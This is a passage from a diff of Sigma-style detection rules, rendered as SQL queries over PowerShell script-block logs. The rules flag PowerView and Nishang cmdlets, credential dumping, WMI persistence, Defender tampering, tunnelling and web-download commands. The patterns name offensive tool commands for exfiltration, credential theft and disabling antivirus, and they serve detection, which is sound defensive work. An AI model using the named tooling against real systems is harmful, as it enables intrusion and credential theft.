'%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" ], - "filename": "posh_ps_cl_invocation_lolscript.yml" + "filename": "posh_ps_powerview_malicious_commandlets.yml" }, { - "title": "Change PowerShell Policies to an Insecure Level - PowerShell", - "id": "61d0475c-173f-4844-86f7-f3eebae1c66b", - "status": "experimental", - "description": "Detects use of Set-ExecutionPolicy to set insecure policies", + "title": "Powershell WMI Persistence", + "id": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", + "status": "test", + "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1546.003" ], "falsepositives": [ - "Administrator script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Set-ExecutionPolicy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Unrestricted%' ESCAPE '\\' OR ScriptBlockText LIKE '%bypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName \\_\\_EventFilter %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName CommandLineEventConsumer %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\')))" ], - "filename": "posh_ps_set_policies_to_unsecure_level.yml" + "filename": "posh_ps_wmi_persistence.yml" }, { - "title": "PowerShell Write-EventLog Usage", - "id": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", - "status": "experimental", - "description": "Detects usage of the \"Write-EventLog\" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Get-ADReplAccount", + "id": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", + "status": "test", + "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1003.006" ], "falsepositives": [ - "Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Write-EventLog%' ESCAPE '\\' AND ScriptBlockText LIKE '%-RawData %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADReplAccount%' ESCAPE '\\' AND ScriptBlockText LIKE '%-All %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Server %' ESCAPE '\\')" ], - "filename": "posh_ps_susp_write_eventlog.yml" + "filename": "posh_ps_get_adreplaccount.yml" }, { - "title": "PowerShell Create Local User", - "id": "243de76f-4725-4f2e-8225-a8a69b15ad61", + "title": "Suspicious Unblock-File", + "id": "5947497f-1aa4-41dd-9693-c9848d58727d", "status": "test", - "description": "Detects creation of a local user via PowerShell", - "author": "@ROxPinTeddy", + "description": "Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1553.005" ], "falsepositives": [ - "Legitimate user creation" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Unblock-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\')" ], - "filename": "posh_ps_create_local_user.yml" + "filename": "posh_ps_susp_unblock_file.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", - "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious Start-Process PassThru", + "id": "0718cd72-f316-4aa2-988f-838ea8533277", + "status": "test", + "description": "Powershell use PassThru option to start in background", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-PassThru %' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath %' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" + "filename": "posh_ps_susp_start_process.yml" }, { - "title": "Suspicious PowerShell Get Current User", - "id": "4096a49c-7de4-4da0-a230-c66ccd56ea5a", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", + "id": "22d80745-6f2c-46da-826b-77adaededd74", "status": "experimental", - "description": "Detects the use of PowerShell to identify the current logged user.", - "author": "frack113", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%[System.Environment]::UserName%' ESCAPE '\\' OR ScriptBlockText LIKE '%$env:UserName%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Security.Principal.WindowsIdentity]::GetCurrent()%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_get_current_user.yml" + "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" }, { - "title": "Powershell XML Execute Command", - "id": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", + "title": "Potential Suspicious Windows Feature Enabled", + "id": "55c925c1-7195-426b-a136-a9396800e29b", "status": "experimental", - "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", + "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate administrative script" + "Legitimate usage of the features listed in the rule." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Xml.XmlDocument%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Load%' ESCAPE '\\' AND (ScriptBlockText LIKE '%IEX %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Expression %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Command %' ESCAPE '\\' OR ScriptBlockText LIKE '%ICM -%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%TelnetServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TFTP%' ESCAPE '\\' OR ScriptBlockText LIKE '%SMB1Protocol%' ESCAPE '\\' OR ScriptBlockText LIKE '%Client-ProjFS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" ], - "filename": "posh_ps_xml_iex.yml" + "filename": "posh_ps_enable_susp_windows_optional_feature.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", - "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "title": "Potential Persistence Via Security Descriptors - ScriptBlock", + "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_var.yml" + "filename": "posh_ps_susp_ace_tampering.yml" }, { - "title": "Automated Collection Command PowerShell", - "id": "c1dda054-d638-4c16-afc8-53e007f3fbc5", - "status": "test", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "author": "frack113", + "title": "Suspicious TCP Tunnel Via PowerShell Script", + "id": "bd33d2aa-497e-4651-9893-5c5364646595", + "status": "experimental", + "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1119" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.doc%' ESCAPE '\\' OR ScriptBlockText LIKE '%.docx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xls%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xlsx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.ppt%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pptx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.rtf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pdf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.txt%' ESCAPE '\\') AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Recurse %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Include %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Net.HttpWebRequest]%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.Sockets.TcpListener%' ESCAPE '\\' AND ScriptBlockText LIKE '%AcceptTcpClient%' ESCAPE '\\')" ], - "filename": "posh_ps_automated_collection.yml" + "filename": "posh_ps_susp_proxy_scripts.yml" }, { - "title": "Tamper Windows Defender - ScriptBlockLogging", - "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", + "title": "Malicious Nishang PowerShell Commandlets", + "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", "status": "experimental", - "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", - "author": "frack113, elhoim, Tim Shelton (fps, alias support)", + "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", + "author": "Alec Costello", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" - ], - "filename": "posh_ps_tamper_defender.yml" - }, - { - "title": "Execute Invoke-command on Remote Host", - "id": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", - "status": "test", - "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", - "author": "frack113", - "tags": [ - "attack.lateral_movement", - "attack.t1021.006" - ], - "falsepositives": [ - "Legitimate script" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%invoke-command %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ComputerName %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_command_remote.yml" + "filename": "posh_ps_nishang_malicious_commandlets.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic", - "id": "ed965133-513f-41d9-a441-e38076a0798f", + "title": "PowerShell PSAttack", + "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", "status": "test", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of PSAttack PowerShell hack tool", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_invocation_generic.yml" + "filename": "posh_ps_psattack.yml" }, { - "title": "Usage Of Web Request Commands And Cmdlets - ScriptBlock", - "id": "1139d2e2-84b1-4226-b445-354492eba8ba", - "status": "experimental", - "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs", - "author": "James Pemberton / @4A616D6573", + "title": "Powershell Directory Enumeration", + "id": "162e69a7-7981-4344-84a9-0f1c9a217a52", + "status": "test", + "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ - "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\' OR ScriptBlockText LIKE '%wget %' ESCAPE '\\' OR ScriptBlockText LIKE '%curl %' ESCAPE '\\' OR ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-BitsTransfer%' 